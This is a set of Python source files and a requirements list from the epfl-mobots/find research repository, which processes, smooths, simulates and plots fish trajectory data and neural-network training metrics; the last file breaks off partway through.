"blob_id": "209e819189b784192ae7d77446e6c695414193ac",
"content_id": "d11416cb6a5080f99db3cd3f817ca60c2955db34",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3137,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 98,
"path": "/find/plots/nn/training_curves.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport os\nimport glob\nimport argparse\nfrom tqdm import tqdm\nfrom copy import deepcopy\n\nfrom find.plots.common import *\nfrom find.plots.nn.training_history import prepare_plot_history\n\n\ndef get_directory_name_at_level(abs_path, depth=0, keep_parents=0):\n path = abs_path\n for _ in range(depth):\n path = os.path.dirname(path)\n\n parents = ''\n if keep_parents > 0:\n parents = [os.path.dirname(path)]\n for _ in range(keep_parents-1):\n parents.append(os.path.dirname(parents[-1]))\n parents = list(map(lambda p: os.path.basename(p) + '/', parents))\n parents = list(reversed(parents))\n parents = ''.join(parents)\n return parents + os.path .basename(path)\n\n\ndef plot(exp_files, path, args):\n test_args = deepcopy(args)\n arg_dict = vars(test_args)\n arg_dict['nn_last_epoch'] = -1\n arg_dict['nn_num_sample_epochs'] = -1\n\n log_files = glob.glob(args.path + '/logs/history.csv')\n test_log_files = glob.glob(args.path + '/test/history.csv')\n # if len(log_files) == 0 or len(test_log_files) == 0:\n # return \n\n plot_dict = prepare_plot_history(log_files, args.path, args)\n # plot_dict_test = prepare_plot_history(test_log_files, args.path, test_args)\n\n # 'epoch,gaussian_mae,gaussian_mse,loss,val_gaussian_mae,val_gaussian_mse,val_loss'\n\n plt.figure(figsize=(10, 6))\n ax = plt.gca()\n lines = ['-', '--', ':']\n linecycler = cycle(lines)\n\n for k in ['loss', 'val_loss']:\n _, x, y = plot_dict[k][0]\n sns.lineplot(x=x, y=y, ax=ax,\n linewidth=uni_linewidth, color='blue', label=k, linestyle=next(linecycler))\n\n # _, _, yt = plot_dict_test['loss'][0]\n # _, _, xt = plot_dict_test['epochs'][0]\n\n # sns.lineplot(x=xt, y=yt, ax=ax,\n # linewidth=uni_linewidth, color='blue', label='test_loss', linestyle=next(linecycler)) \n ax.legend()\n ax.set_xlabel('Epochs')\n ax.set_xlim([0, x[-1]])\n # ax.set_ylim([-3, 3]) # TODO: remove\n plt.savefig(args.path + '/test.png')\n plt.close()\n\n plt.figure(figsize=(10, 6))\n ax = plt.gca()\n lines = ['-', '--']\n linecycler = cycle(lines)\n\n for k in ['gaussian_mse', 'val_gaussian_mse']:\n _, x, y = plot_dict[k][0]\n sns.lineplot(x=x, y=y, ax=ax,\n linewidth=uni_linewidth, color='blue', label=k, linestyle=next(linecycler))\n\n # _, _, yt = plot_dict_test['gaussian_mse'][0]\n # _, _, xt = plot_dict_test['epochs'][0]\n\n # sns.lineplot(x=xt, y=yt, ax=ax,\n # linewidth=uni_linewidth, color='blue', label='test_gaussian_mse', linestyle=next(linecycler)) \n\n ax.legend()\n ax.set_xlabel('Epochs')\n # ax.set_xlim([0, x[-1]])\n plt.savefig(args.path + '/test2.png')\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Plot NN metrics from the training history')\n parser.add_argument('--path', '-p',\n type=str,\n help='Path to the experiment',\n required=True)\n args = parser.parse_args()\n\n plot(None, './', args)\n"
},
{
"alpha_fraction": 0.5169230699539185,
"alphanum_fraction": 0.7415384650230408,
"avg_line_length": 22.214284896850586,
"blob_id": "a91f0dd6022937e56f8f012d232756dedc0b8607",
"content_id": "4e981abb701398fca5100a119a963f52ca3e070d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 325,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 14,
"path": "/find/simulation/simu/requirements.txt",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "astroid==2.4.2\nautopep8==1.5.3\nisort==4.3.21\nlazy-object-proxy==1.4.3\nmccabe==0.6.1\nnumpy==1.19.1\npycodestyle==2.6.0\npylint==2.5.3\n-e [email protected]:bpapaspyros/python-particle-simu.git@bc00436c57eb5d7de99737908494c35cc678f6a4#egg=python_particle_simu\nsix==1.15.0\ntoml==0.10.1\ntqdm==4.48.2\ntyped-ast==1.4.1\nwrapt==1.12.1\n"
},
{
"alpha_fraction": 0.5534883737564087,
"alphanum_fraction": 0.5581395626068115,
"avg_line_length": 30.617647171020508,
"blob_id": "e20a542a5a5fa488898edd665ea74f8f82657bbe",
"content_id": "93ef9e9ef9089908380fb843871b83fed2fec112",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1075,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 34,
"path": "/find/simulation/nn_prediction_stat.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "from find.simulation.simu.stat.stat_base import StatBase\n\nimport numpy as np\nfrom pathlib import Path\n\n\nclass NNPredictionStat(StatBase):\n def __init__(self, nn_functor, dims, filename, dirname=''):\n super().__init__(filename, dirname)\n self._positions = np.empty((0, dims))\n self._dims = dims\n self._nn_functor = nn_functor\n\n def get_filename(self):\n return self._filename\n\n def get(self):\n return self._positions\n\n def save(self):\n np.savetxt(Path(self._dirname).joinpath(\n self._filename), self._positions)\n\n def __call__(self, simu):\n if simu.get_current_iteration() > 1:\n individuals = simu.get_individuals()\n row = np.empty((1, self._dims))\n for ind in individuals:\n if ind.is_robot():\n pos = ind.get_position()\n else:\n pos = self._nn_functor(ind.get_id(), simu)\n row = np.hstack((row, pos.reshape(1, -1)))\n self._positions = np.vstack((self._positions, row))\n"
},
{
"alpha_fraction": 0.5281879305839539,
"alphanum_fraction": 0.5410737991333008,
"avg_line_length": 36.25,
"blob_id": "a00be3966c5872defbe3c8705f16929dd6941e28",
"content_id": "5697c98510776c1f2a4e1744ce3bb0c92d47ae7d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7450,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 200,
"path": "/find/utils/utils.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\nclass ExperimentInfo:\n \"\"\"Container class for a single experiment's information. This is useful for aligning all the experiments\n in terms of the setup position, etc.\n \"\"\"\n\n def __init__(self, data):\n \"\"\"\n :param data: np.array of the raw iDTracker data (this includes confidence values for the fish positions)\n \"\"\"\n self._maxXs = [np.max(np.delete(matrix, np.s_[1::2], 1))\n for matrix in data]\n self._minXs = [np.min(np.delete(matrix, np.s_[1::2], 1))\n for matrix in data]\n self._maxYs = [np.max(np.delete(matrix, np.s_[0::2], 1))\n for matrix in data]\n self._minYs = [np.min(np.delete(matrix, np.s_[0::2], 1))\n for matrix in data]\n\n self._init_limits()\n\n def _init_limits(self):\n self._global_minX = np.min(self._minXs)\n self._global_maxX = np.max(self._maxXs)\n self._global_minY = np.min(self._minYs)\n self._global_maxY = np.max(self._maxYs)\n\n def center(self, idx=-1):\n \"\"\"\n :param idx: int, optional index of the individual's trajectories that will be used as reference for determining\n the setup's center. If -1 the center will be computed by looking at all individuals.\n :return: tuple(float, float) of the center coordinates\n \"\"\"\n if idx < 0:\n return ((self._global_maxX + self._global_minX) / 2, (self._global_maxY + self._global_minY) / 2)\n else:\n return ((self._maxXs[idx] + self._minXs[idx]) / 2, (self._maxYs[idx] + self._minYs[idx]) / 2)\n\n def setMinXY(self, vals, idx):\n (self._minXs[idx], self._minYs[idx]) = vals\n self._init_limits()\n\n def setMaxXY(self, vals, idx):\n (self._maxXs[idx], self._maxYs[idx]) = vals\n self._init_limits()\n\n def minXY(self, idx):\n \"\"\"\n :param idx: int index of the individual's trajectories\n :return: tuple(float, float) minimum values for X and Y\n \"\"\"\n return (self._minXs[idx], self._minYs[idx])\n\n def maxXY(self, idx):\n \"\"\"\n :param idx: int index of the individual's trajectories\n :return: tuple(float, float) maximum values for X and Y\n \"\"\"\n return (self._maxXs[idx], self._maxYs[idx])\n\n \"\"\"\n :return: tuple(float, float) global minimum values for X and Y\n \"\"\"\n\n def globalMinXY(self):\n return (self._global_minX, self._global_minY)\n\n \"\"\"\n :return: tuple(float, float) global maximum values for X and Y\n \"\"\"\n\n def globalMaxXY(self):\n return (self._global_maxX, self._global_maxY)\n\n def printInfo(self):\n print('Center: ' + str(self.center()))\n print('min(X, Y): ' + str(self._global_minX) +\n ', ' + str(self._global_minY))\n print('max(X, Y): ' + str(self._global_maxX) +\n ', ' + str(self._global_maxY))\n\n\nclass Center:\n \"\"\"Class responsible for centering the experimental data to (0, 0). 
This is especially useful in cases were\n the experimental setup might slightly (or even significantly) move from one experiment to the next.\n \"\"\"\n\n def __init__(self, data, info, args={}):\n \"\"\"\n :param data: list(np.array) of matrices with (position) information\n :param info: ExperimentInfo instance for the given\n :param args: dict, optional extra arguments for the function (not applicable)\n \"\"\"\n\n for i, matrix in enumerate(data):\n c = info.center(i)\n for n in range(matrix.shape[1] // 2):\n matrix[:, n * 2] = matrix[:, n * 2] - c[0]\n matrix[:, n * 2 + 1] = matrix[:, n * 2 + 1] - c[1]\n self._data = data\n self._info = ExperimentInfo(data)\n\n def get(self):\n \"\"\"\n :return: tuple(list(np.array), ExperimentInfo) the centered positions and updated experiment information\n \"\"\"\n return self._data, self._info\n\n\nclass Normalize:\n \"\"\"Class responsible for normalizing the experimental data in the range [-1, 1]. Different experiments might have\n slightly different boundaries due to changes in the setup's position. The normalization process allows for\n bringing all experiments in the same range and comparing the behavioural side without numerical issues.\n \"\"\"\n\n def __init__(self, data, info, args={'is_circle': True}):\n \"\"\"\n :param data: list(np.array) of matrices with (position) information\n :param info: ExperimentInfo instance for the given\n :param args: dict, optional extra arguments for the function (not applicable)\n \"\"\"\n\n for i, matrix in enumerate(data):\n xminh = info.minXY(i)[0]\n xmaxh = info.maxXY(i)[0]\n yminh = info.minXY(i)[1]\n ymaxh = info.maxXY(i)[1]\n maxdh = max([xmaxh-xminh, ymaxh-yminh])\n radius = maxdh / 2\n c = info.center(i)\n\n if args['is_circle']:\n for n in range(matrix.shape[1] // 2):\n rads = matrix\n rads[:, n * 2] -= c[0]\n rads[:, n * 2 + 1] -= c[1]\n phis = np.arctan2(rads[:, n * 2 + 1], rads[:, n * 2])\n rads[:, n * 2] = rads[:, n * 2] ** 2\n rads[:, n * 2 + 1] = rads[:, n * 2 + 1] ** 2\n rads = np.sqrt(rads[:, n * 2] + rads[:, n * 2 + 1])\n rads /= radius\n matrix[:, n * 2] = rads * np.cos(phis)\n matrix[:, n * 2 + 1] = rads * np.sin(phis)\n else:\n maxXY = info.maxXY(i)\n for n in range(matrix.shape[1] // 2):\n matrix[:, n * 2] /= maxXY[0]\n matrix[:, n * 2 + 1] /= maxXY[1]\n self._data = data\n self._info = ExperimentInfo(data)\n\n def get(self):\n \"\"\"\n :return: tuple(list(np.array), ExperimentInfo) the centered positions and updated experiment information\n \"\"\"\n return self._data, self._info\n\n\ndef angle_to_pipi(angle):\n \"\"\"\n :param angle: float angle difference between the heading of two individuals\n :return: float smallest difference within the range of -pi and pi\n \"\"\"\n while True:\n if angle < -np.pi:\n angle += 2. * np.pi\n if angle > np.pi:\n angle -= 2. 
* np.pi\n if (np.abs(angle) <= np.pi):\n break\n return angle\n\n\ndef compute_leadership(positions, velocities):\n ang0 = np.arctan2(positions[:, 1] - positions[:, 3],\n positions[:, 0] - positions[:, 2])\n ang1 = np.arctan2(positions[:, 3] - positions[:, 1],\n positions[:, 2] - positions[:, 0])\n theta = [ang1, ang0]\n\n previous_leader = -1\n leader_changes = -1\n leadership_timeseries = []\n\n for i in range(velocities.shape[0]):\n angles = []\n for j in range(velocities.shape[1] // 2):\n phi = np.arctan2(velocities[i, j * 2 + 1], velocities[i, j * 2])\n psi = angle_to_pipi(phi - theta[j][i])\n angles.append(np.abs(psi))\n\n geo_leader = np.argmax(angles)\n if geo_leader != previous_leader:\n leader_changes += 1\n previous_leader = geo_leader\n leadership_timeseries.append([i, geo_leader])\n\n return (leader_changes, leadership_timeseries)\n"
},
{
"alpha_fraction": 0.4364733397960663,
"alphanum_fraction": 0.4782657325267792,
"avg_line_length": 36.132781982421875,
"blob_id": "fdf0145d92c995b9092dc3de762254175add22b2",
"content_id": "e4acafb94185dae2c13aba784b5f47c6d78a9997",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8949,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 241,
"path": "/find/plots/dl_si_2021/collective_quantities.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport glob\nimport argparse\nfrom turtle import position\n\nfrom find.utils.features import Velocities\nfrom find.plots.common import *\nimport find.plots.common as shared\n\nimport find.plots.spatial.interindividual_distance as interd\nimport find.plots.spatial.relative_orientation as relor\n\nfrom matplotlib.ticker import (MultipleLocator, FormatStrFormatter,\n AutoMinorLocator, FuncFormatter)\n\nROBOT_DATA = True\nTRAJNET_DATA = False\nPFW_DATA = False\nDISABLE_TOULOUSE = False\n\n# TRAJNET_DATA = False\n# PFW_DATA = False\n# DISABLE_TOULOUSE = False\n\n# TRAJNET_DATA = False\n# PFW_DATA = True\n# DISABLE_TOULOUSE = False\n\n# TRAJNET_DATA = True\n# PFW_DATA = False\n# DISABLE_TOULOUSE = True\n\n\ndef reset_palette():\n if TRAJNET_DATA:\n shared._uni_pallete = [\"#000000\", \"#ed8b02\", \"#e74c3c\"]\n elif PFW_DATA:\n shared._uni_pallete = [\"#000000\", \"#D980FA\"]\n elif ROBOT_DATA:\n shared._uni_pallete = [\"#000000\", \"#e74c3c\", \"#2596be\"]\n else:\n shared._uni_pallete = [\"#000000\", \"#e74c3c\", \"#3498db\", \"#2ecc71\"]\n\n\ndef annot_axes(ax, xlabel, ylabel, xlim, ylim, xloc, yloc, yscale):\n ax.set_xlabel(xlabel)\n ax.set_xlim(xlim)\n ax.xaxis.set_major_locator(MultipleLocator(xloc[0]))\n ax.xaxis.set_minor_locator(MultipleLocator(xloc[1]))\n ax.tick_params(axis=\"x\", which='both',\n direction=\"in\")\n ax.tick_params(axis=\"x\", which='major', length=4.0, width=0.7)\n ax.tick_params(axis=\"x\", which='minor', length=2.0, width=0.7)\n\n ax.set_ylabel(ylabel)\n ylim = [e / yscale for e in ylim]\n ax.set_ylim(ylim)\n ax.get_yaxis().set_major_formatter(\n FuncFormatter(lambda x, p: '{:.1f}'.format(x * yscale, ',')))\n ax.yaxis.set_major_locator(MultipleLocator(yloc[0] / yscale))\n ax.yaxis.set_minor_locator(MultipleLocator(yloc[1] / yscale))\n ax.tick_params(which='both', bottom=True,\n left=True, right=True, top=True)\n ax.tick_params(axis=\"y\", which='both', direction=\"in\")\n ax.grid(False)\n return ax\n\n\ndef plot(exp_files, path, args):\n data = {}\n for e in sorted(exp_files.keys()):\n pos = glob.glob(args.path + '/' + exp_files[e])\n if len(pos) == 0:\n continue\n data[e] = {}\n data[e]['pos'] = []\n data[e]['vel'] = []\n data[e]['rvel'] = []\n data[e]['interindividual_distance'] = []\n for p in pos:\n if e == 'Virtual (Toulouse)' and not DISABLE_TOULOUSE:\n f = open(p)\n # to allow for loading fortran's doubles\n strarray = f.read().replace(\"D+\", \"E+\").replace(\"D-\", \"E-\")\n f.close()\n num_ind = len(strarray.split('\\n')[0].strip().split(' '))\n positions = np.fromstring(\n strarray, sep='\\n').reshape(-1, num_ind) * args.radius\n elif e == 'Virtual (Toulouse cpp)':\n positions = np.loadtxt(p)[:, 2:] * args.radius\n else:\n positions = np.loadtxt(p) * args.radius\n if e == 'Robot':\n velocities = Velocities([positions], 0.1).get()[0]\n else:\n velocities = Velocities([positions], args.timestep).get()[0]\n linear_velocity = np.array((velocities.shape[0], 1))\n tup = []\n for i in range(velocities.shape[1] // 2):\n linear_velocity = np.sqrt(\n velocities[:, i * 2] ** 2 + velocities[:, i * 2 + 1] ** 2).tolist()\n tup.append(linear_velocity)\n\n distance = np.sqrt(\n (positions[:, 0] - positions[:, 2]) ** 2 + (positions[:, 1] - positions[:, 3]) ** 2)\n\n data[e]['rvel'].append(np.array(tup).T)\n data[e]['pos'].append(positions)\n data[e]['vel'].append(velocities)\n data[e]['interindividual_distance'].append(distance)\n\n ###############################################################################\n # Virtual\n 
###############################################################################\n _, ax = plt.subplots(figsize=(10, 3),\n nrows=1, ncols=3,\n gridspec_kw={'width_ratios': [\n 1, 1, 1], 'wspace': 0.3, 'hspace': 0.38}\n )\n\n # distance to wall\n distances = {}\n for k in data.keys():\n distances[k] = data[k]['interindividual_distance']\n sub_data = distances.copy()\n if 'Hybrid' in sub_data.keys():\n del sub_data['Hybrid']\n\n reset_palette()\n ax[0] = interd.interindividual_distance(sub_data, ax[0], args, [0, 35])\n yscale = 100\n ax[0] = annot_axes(ax[0],\n r'$d_{ij}$ (cm)',\n r'PDF $(\\times {})$'.format(yscale),\n [0.0, 25.0], [0.0, 15.0],\n # [0.0, 35.0], [0.0, 15.0],\n [5, 2.5], [3, 1.5],\n yscale)\n\n # relative orientation\n sub_data = data.copy()\n if 'Hybrid' in sub_data.keys():\n del sub_data['Hybrid']\n reset_palette()\n relor.relative_orientation_to_neigh(sub_data, ax[1], args)\n yscale = 1000\n ax[1] = annot_axes(ax[1],\n r'$\\phi_{ij}$ $(^{\\circ})$',\n r'PDF $(\\times {})$'.format(yscale),\n [-180, 180.0], [0.0, 15.0],\n [90, 30], [3, 1.5],\n yscale)\n\n # viewing angle\n sub_data = data.copy()\n if 'Hybrid' in sub_data.keys():\n del sub_data['Hybrid']\n reset_palette()\n relor.viewing_angle(sub_data, ax[2], args)\n yscale = 1000\n ax[2] = annot_axes(ax[2],\n r'$\\psi_{ij}$ $(^{\\circ})$',\n r'PDF $(\\times {})$'.format(yscale),\n [-180, 180.0], [0.0, 14.5],\n [90, 30], [3, 1.5],\n yscale)\n\n # ax[0].text(-0.2, 1.07, r'$\\mathbf{A}$',\n # fontsize=18, transform=ax[0].transAxes)\n # ax[1].text(-0.2, 1.07, r'$\\mathbf{B}$',\n # fontsize=18, transform=ax[1].transAxes)\n # ax[2].text(-0.2, 1.07, r'$\\mathbf{C}$',\n # fontsize=18, transform=ax[2].transAxes)\n\n plt.gcf().subplots_adjust(bottom=0.141, left=0.062, top=0.965, right=0.985)\n plt.savefig(path + 'collective_quantities_virtual.png')\n\n ###############################################################################\n # Hybrid\n ###############################################################################\n _, ax = plt.subplots(figsize=(10, 3),\n nrows=1, ncols=3,\n gridspec_kw={'width_ratios': [\n 1, 1, 1], 'wspace': 0.3, 'hspace': 0.38}\n )\n\n sub_data = distances.copy()\n if 'Virtual' in sub_data.keys():\n del sub_data['Virtual']\n if 'Virtual (Toulouse)' in sub_data.keys():\n del sub_data['Virtual (Toulouse)']\n reset_palette()\n ax[0] = interd.interindividual_distance(sub_data, ax[0], args, [0, 30])\n yscale = 100\n ax[0] = annot_axes(ax[0],\n r'$d_{ij}$ (cm)',\n r'PDF $(\\times {})$'.format(yscale),\n # [0.0, 25.0], [0.0, 15.0],\n [0.0, 35.0], [0.0, 15.0],\n [5, 2.5], [3, 1.5],\n yscale)\n\n sub_data = data.copy()\n if 'Virtual' in sub_data.keys():\n del sub_data['Virtual']\n if 'Virtual (Toulouse)' in sub_data.keys():\n del sub_data['Virtual (Toulouse)']\n reset_palette()\n relor.relative_orientation_to_neigh(sub_data, ax[1], args)\n yscale = 1000\n ax[1] = annot_axes(ax[1],\n r'$\\phi_{ij}$ $(^{\\circ})$',\n r'PDF $(\\times {})$'.format(yscale),\n [-180, 180.0], [0.0, 15.0],\n [90, 30], [3, 1.5],\n yscale)\n\n sub_data = data.copy()\n if 'Virtual' in sub_data.keys():\n del sub_data['Virtual']\n if 'Virtual (Toulouse)' in sub_data.keys():\n del sub_data['Virtual (Toulouse)']\n reset_palette()\n relor.viewing_angle(sub_data, ax[2], args)\n yscale = 1000\n ax[2] = annot_axes(ax[2],\n r'$\\psi_{ij}$ $(^{\\circ})$',\n r'PDF $(\\times {})$'.format(yscale),\n [-180, 180.0], [0.0, 14.5],\n [90, 30], [3, 1.5],\n yscale)\n\n # ax[0].text(-0.2, 1.07, r'$\\mathbf{A}$',\n # fontsize=18, transform=ax[0].transAxes)\n # 
ax[1].text(-0.2, 1.07, r'$\\mathbf{B}$',\n # fontsize=18, transform=ax[1].transAxes)\n # ax[2].text(-0.2, 1.07, r'$\\mathbf{C}$',\n # fontsize=18, transform=ax[2].transAxes)\n\n plt.gcf().subplots_adjust(bottom=0.141, left=0.062, top=0.965, right=0.985)\n plt.savefig(path + 'collective_quantities_hybrid.png')\n"
},
{
"alpha_fraction": 0.7828418016433716,
"alphanum_fraction": 0.7828418016433716,
"avg_line_length": 33.96875,
"blob_id": "b79bdb948ccd162d03eac6631760aee9d6e2d65c",
"content_id": "ce3227304b1627da7acf1804e1526445d22ecad5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1119,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 32,
"path": "/find/plots/spatial/__init__.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "from find.plots.spatial import angular_velocity\nfrom find.plots.spatial import distance_to_wall\nfrom find.plots.spatial import grid_occupancy\nfrom find.plots.spatial import interindividual_distance\nfrom find.plots.spatial import relative_orientation\nfrom find.plots.spatial import resultant_acceleration\nfrom find.plots.spatial import resultant_velocity\nfrom find.plots.spatial import future_trajectory_variance\nfrom find.plots.spatial import grid_distribution_comparison\n\nplot_dict = {\n 'angular_velocity': angular_velocity.plot,\n 'distance_to_wall': distance_to_wall.plot,\n 'grid_occupancy': grid_occupancy.plot,\n 'interindividual_distance': interindividual_distance.plot,\n 'relative_orientation': relative_orientation.plot,\n 'resultant_acceleration': resultant_acceleration.plot,\n 'resultant_velocity': resultant_velocity.plot,\n 'future_trajectory_variance': future_trajectory_variance.plot,\n 'grid_distribution_comparison': grid_distribution_comparison.plot,\n}\n\n\nsource = 'spatial'\n\n\ndef available_plots():\n return list(plot_dict.keys())\n\n\ndef get_plot(key):\n return plot_dict[key]\n"
},
{
"alpha_fraction": 0.5661590695381165,
"alphanum_fraction": 0.5719119906425476,
"avg_line_length": 36.88461685180664,
"blob_id": "99d9ccf48ca09fff818acd5e88cc229488f5589b",
"content_id": "d4170b65beaacf2fd19cc6e16363053b50ed0c13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2955,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 78,
"path": "/find/smoothing/exp_smooth.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport argparse\nimport glob\nimport numpy as np\n\nfrom find.utils.features import Velocities\nfrom find.utils.utils import ExperimentInfo, Center, Normalize\n\n\ndef exp_filter(signal, alpha):\n \"\"\"\n :brief: smooths a signal using an exponential function\n\n :param signal: np.array that represents a signal\n :param alpha: float exponent for the smoothing function\n :return: np.array of the smoothed signal values\n \"\"\"\n filtered_signal = []\n for n in range(signal.shape[1]):\n sig = signal[:, n]\n filtered_sig = [sig[0]]\n # y(k) = y(k-1) + (1-a)*( x(k) - y(k-1) )\n for m in range(1, sig.shape[0]):\n filtered_sig.append(\n filtered_sig[-1] + (1 - alpha) * (sig[m] - filtered_sig[-1]))\n filtered_signal.append(filtered_sig)\n return np.transpose(np.array(filtered_signal))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Exponential smoothing for the fish trajectories')\n parser.add_argument('--path', '-p', type=str,\n help='Path to the experiment',\n required=True)\n parser.add_argument('--fps', type=int,\n help='Camera framerate',\n required=True)\n parser.add_argument('--centroids', '-c', type=int,\n help='Frames to use in order to compute the centroidal positions',\n required=True)\n parser.add_argument('--alpha', '-a', type=float,\n default=0.1,\n help='Smoothing factor',\n required=False)\n parser.add_argument('--alpha_velocity', type=float,\n default=0.1,\n help='Smoothing factor',\n required=False)\n parser.add_argument('--center', action='store_true',\n help='Center smoothed data')\n parser.add_argument('--norm', action='store_true',\n help='Normalize smoothed data')\n args = parser.parse_args()\n\n timestep = args.centroids / args.fps\n\n files = glob.glob(args.path + '/*processed_positions.dat')\n data = []\n for f in files:\n positions = np.loadtxt(f)\n data.append(exp_filter(positions, args.alpha))\n\n info = ExperimentInfo(data)\n if args.center:\n data, info = Center(data, info).get()\n if args.norm:\n data, info = Normalize(data, info).get()\n velocities = Velocities(data, timestep).get()\n\n for i, f in enumerate(files):\n f = files[i]\n new_f = f.replace('positions.dat', 'positions_filtered.dat', 1)\n np.savetxt(new_f, data[i])\n new_f = f.replace('positions.dat', 'velocities_filtered.dat', 1)\n np.savetxt(new_f, velocities[i])\n new_f = f.replace('positions.dat', 'velocities_filtered_twice.dat', 1)\n np.savetxt(new_f, exp_filter(velocities[i], args.alpha_velocity))\n"
},
{
"alpha_fraction": 0.5027417540550232,
"alphanum_fraction": 0.5251246094703674,
"avg_line_length": 37.13688278198242,
"blob_id": "70032ab3f07c1b2a66f29aa0dfdedce78ee9e828",
"content_id": "272b2d6cc2290ba017e63c0be1d2be4e1ff791cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 20060,
"license_type": "no_license",
"max_line_length": 139,
"num_lines": 526,
"path": "/find/plots/nn/trajectory_prediction.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nfrom cProfile import label\nimport os\nimport glob\nimport argparse\nfrom tqdm import tqdm\nfrom copy import copy\n\nimport colorsys\nimport matplotlib\nimport matplotlib.colors as mc\nimport matplotlib.lines as mlines\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes\n\nimport find.plots as fp\nfrom find.plots.common import *\nfrom find.utils.features import Velocities\nfrom find.models.storage import ModelStorage\nfrom find.simulation.fish_simulation import FishSimulation\nfrom find.simulation.simulation_factory import available_functors, SimulationFactory\nfrom find.simulation.tf_nn_functors import get_most_influential_individual\nfrom find.plots.spatial.grid_occupancy import construct_grid\n\nfrom PIL import Image\n\noc = mpl.path.Path([(0, 0), (1, 0)])\n\nhandles_a = [\n mlines.Line2D([0], [0], color='black', marker=oc,\n markersize=6, label='Median'),\n mlines.Line2D([], [], linestyle='none', color='black', marker='H',\n markersize=4, label='Mean'),\n # mlines.Line2D([], [], linestyle='none', markeredgewidth=1, marker='o',\n # color='black', markeredgecolor='w', markerfacecolor='black', alpha=0.6,\n # markersize=5, label='Sample'),\n # mlines.Line2D([], [], linestyle='none', markeredgewidth=0, marker='*',\n # color='black', markeredgecolor='w', markerfacecolor='black',\n # markersize=6, label='Statistical significance'),\n]\n\n\ndef simulate(data, model, args):\n simu_factory = SimulationFactory()\n simu = simu_factory(\n data, model, args.nn_functor, args.backend, args)\n if simu is None:\n import warnings\n warnings.warn('Skipping small simulation')\n return False, None\n if args.backend == 'keras':\n means = np.empty([0, 4])\n stds = np.empty([0, 4])\n for i in range(simu.get_num_iterations()):\n simu.spin_once()\n simu.dump()\n inds = simu.get_individuals()\n m = np.hstack([*inds[0].get_functor().get_means()]).reshape(1, -1)\n means = np.vstack([means, m])\n s = np.hstack([*inds[0].get_functor().get_stds()]).reshape(1, -1)\n stds = np.vstack([stds, s])\n gen_traj = simu.get_stats()[0].get()[args.num_timesteps:, :]\n return True, gen_traj, means, stds\n elif args.backend == 'trajnet':\n simu.spin_once()\n simu.dump()\n inds = simu.get_individuals()\n means = np.hstack([*inds[0].get_functor().get_means()])\n stds = np.hstack([*inds[0].get_functor().get_stds()])\n gen_traj = np.hstack([*inds[0].get_functor().get_full_pred()])\n return True, gen_traj, means, stds\n return False, None, None, None\n\n\ndef generate_traj(exp_files, path, args):\n arg_dict = vars(args)\n arg_dict['iterations'] = args.pred_len\n arg_dict['num_extra_virtu'] = 0\n arg_dict['most_influential_individual'] = 'closest'\n arg_dict['simu_stat_dump_period'] = 1\n arg_dict['distance_inputs'] = True\n arg_dict['stats_enabled'] = True\n args.simu_out_dir = args.path + '/trajectory_pred/' + args.backend\n args.exclude_index = -1\n\n ms = ModelStorage(path=args.path, create_dirs=False)\n model = ms.load_model(args.path + '/model_checkpoint/' +\n args.nn_model_ref, args.backend, args)\n\n skipped_files = 0\n files = glob.glob(args.path + '/' + exp_files['Real'])\n for f in files:\n arg_dict['reference'] = f\n\n trajectories = np.loadtxt(f)\n if args.pred_len + args.num_timesteps > trajectories.shape[0]:\n skipped_files += 1\n continue\n\n iters = trajectories.shape[0] - \\\n (args.pred_len + args.num_timesteps)\n for i in range(iters):\n args.reference = args.reference.replace(\n 'positions', 'positions_{}-{}'.format(args.num_timesteps + i, i + args.num_timesteps + 
